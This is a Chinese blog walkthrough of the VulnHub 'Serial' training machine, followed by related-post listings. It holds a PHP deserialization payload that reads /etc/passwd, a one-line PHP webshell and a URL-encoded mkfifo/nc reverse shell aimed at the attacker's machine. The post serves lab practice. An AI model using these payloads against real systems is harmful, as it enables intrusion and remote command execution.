反序列化--serial

已于 2024-08-01 23:18:11 修改
阅读量220 收藏 4
点赞数 5
文章标签: linux 运维 服务器
于 2024-08-01 23:03:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57524749/article/details/140854151
版权

去vulhub上下载此靶机:
https://www.vulnhub.com/entry/serial-1,349/
用Vmware新建虚拟机打开

用kali扫描ip  arp-scan -l

访问扫描到的靶机ip访问

按F12 ---》网络---》cookie得到一串编码

base64解码

dirb http://靶机ip   扫描目录

访问backup目录

解压得到三个php文件

构造payload

<?php
  class Log {
    private $type_log = "/etc/passwd";
  }
 
  class User {
    private $name = "admin";
    private $wel;
 
    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));
?>

访问构造好的php文件获取到base64编码后的字节序列

抓包,将编码后的数据抓包后替换红色部分

写一个cmd.txt文件

<?php @system($ GET['cmd']); ?>

修改palyload改为本机ip加上我们创建的文件

访问重新修改的gouzao.php文件

攻击模块替换 查询ip

成功执行反弹shell

讲以下参数修改为kali  ip 和指定端口去kali监听

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.162.129+8888+>/tmp/f

开启监听  

查找txt文件

查看账号密码

用御剑扫描端口

远程连接 

这河狸吗.
关注
序列化--Serial
xuyin1204的博客
12-04 560
序列化和反序列化
反序列化靶机--serial
weixin_53736204的博客
08-03 471
可以去vulhub上下载此靶机:下载好,之后,使用Vmware新建虚拟机打开,步骤如下:1.首先创建新的虚拟机。保持现有格式打开虚拟机,环境配置完成。
反序列化靶机-serial攻略
qq_68186313的博客
08-01 519
8、查看代码,发现index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。7、下载bak.zip,解压发现3个php文件。
【简单】二叉树的序列化和反序列化-Java:解法一
了解➔熟悉➔掌握➔精通
01-16 278
package live.every.day.ProgrammingDesign.CodingInterviewGuide.BinaryTree; import live.every.day.ProgrammingDesign.CodingInterviewGuide.BinaryTree.BinaryTreePrinter2.Node; import java.util.LinkedList; import java.util.Queue; /** * 二叉树的序列化和反序列化 * * 【题目
java移除序列化_Java中的序列化、反序列化-serializable和serialversionUID
weixin_39929721的博客
02-26 480
在Java项目中,我们经常对实体类进行implement serializable,在实体类中又加上一句private static final long serialVersionUID = 5177165015785112433L;最开始只知道是跟实体类的序列化有关,但是没有深究,昨天突然想起来了,于是想知道到底是什么东西,在这里小手一抖,记录一下......这里补充一下小知识:1、序列化、反...
vulhub-serial-php反序列化靶机实战
飞鱼的企鹅的博客
01-04 1967
前言 此漏洞环境是vulhub上的系列漏洞之一,是php反序列化漏洞,也用到了远程代码执行漏洞。 复现过程 环境搭建 靶机下载地址 https://www.vulnhub.com/entry/serial-1,349/ 下载好之后直接用Vmware workstation打开就行了 存活扫描 内网存活主机扫描 arp-scan -l 扫描到的存活主机是192.168.77.157 端口扫描 ...
vulhub-serial-php反序列化靶机
日常打一些漏洞靶机
08-06 729
然后构造payload,尝试读取passwd文件,payload如下 新创建一个123.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马。然后去抓包 把访问123.php得到的base64编码 替换cookie 然后打一个whoami成功执行。然后去访问自己新创建的php 我这里用的是123.php 打开就看到他的base64编码。使用御剑扫描发现存在**…/backup/**路径,访问发现存在目录遍历漏洞。查看文件,多返回几次上级目录,找到一个txt文件。
Android序列化-Serial库
爱自在的专栏
07-20 226
这个代码包括了 int数组,对象的序列化和反序列化Serial是由Twitter高性能序列化方案,它力求帮助开发者实现高性能和高可控的序列化过程。 GitHub:https://github.com/twitter/Serial/blob/master/README-CHINESE.rst/ Serial方案的主要优点如下: 相比起传统的反射序列化方案更加高效(没有使用反射) 性能相比传统方案提升了3倍 (序列化的速度提升了5倍,反序列化提升了2.5倍) 序列化生成的数据量(byte[.
Java序列化和反序列化--jdk的序列化和反序列化方式
学来所记,记来所思,思来所写
09-22 370
基本概念 序列化:把存储在内存中的数据,转换为可传输数据流的过程,以便进行网络传输或者保存到本地 反序列化:把流中的数据,转换成对象的形式 原因:在服务之间调用,或者rpc之间调用时,对象是如何进行传输的,那么就是通过序列化转变为可以传输的流,进行交互。 基本案例 实体类都是User 工具类为SerialUtilpublic class SerialUtil { public <T> byte[] serialize(T obj){ ByteArrayOutpu
二叉树的序列化和反序列化-前序遍历 非递归
tfdev的博客
12-22 467
二叉树的序列化和反序列化-前序遍历 非递归版本
【漏洞复现】用友-U8C-反序列化-LoginVideoServlet
知黑而守白
04-23 139
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8Cloud LoginVideoServlet 接口存反序列化漏洞,攻击者可能通过操纵序列化的数据,引发未经授权的代码执行,从而危及应用程序的安全性。
【漏洞复现】用友-U8C-反序列化-TableInputOperServlet
知黑而守白
04-23 325
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8Cloud TableInputOperServlet 接口存反序列化漏洞,攻击者可能通过操纵序列化的数据,引发未经授权的代码执行,从而危及应用程序的安全性。
【漏洞复现】用友-U8C-反序列化-CacheInvokeServlet
知黑而守白
04-19 157
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8C CacheInvokeServlet接口存在反序列化漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
【漏洞复现】用友-U8C-反序列化-ServletCommander
知黑而守白
05-05 238
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8Cloud ServletCommander 接口存反序列化漏洞,攻击者可能通过操纵序列化的数据,引发未经授权的代码执行,从而危及应用程序的安全性。
【2024版】最新kali linux入门及常用简单工具介绍(非常详细)零基础入门到精通,收藏这一篇就够了_kalilinux
weixin_57514792的博客
10-07 1262
最新kali linux入门及常用简单工具介绍
Linux从小白到高手》综合应用篇:详解Linux系统调优之内存优化
最新发布
qq_45732829的博客
10-11 671
内存是影响Linux性能的主要因素之一,内存资源的充足与否直接影响应用系统的使用性能。内存调优的主要目标是合理分配和利用内存资源,减少内存浪费,提高内存利用率,从而提升系统整体性能。
linux之curl
qq_41081716的博客
10-06 439
发送指定的数据作为POST请求的主体。数据可以是键值对的形式。: 添加自定义HTTP头部。可以多次使用以添加多个头部。: 用于发送表单数据,特别是文件上传。: 指定请求方法,例如。
Linux下Qt项目出现libQt5WebEngineCore.so报错
weixin_74239923的博客
10-08 174
总的来说,这条命令的目的是将ld.gold链接器设置为系统默认的链接器,通过替换/usr/bin/ld来实现。
Linux——定时任务调度
什么时候才不是菜鸟....
10-08 361
定时任务调度
Java对象序列化与反序列化规范详解
"serial-spec[1].pdf 是一份关于Java对象序列化和反序列化的规范文档,主要面向中高级开发人员,旨在详细阐述如何在Java系统中将对象转化为可存储或传输的序列化形式,以及如何从序列化数据恢复原始对象。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值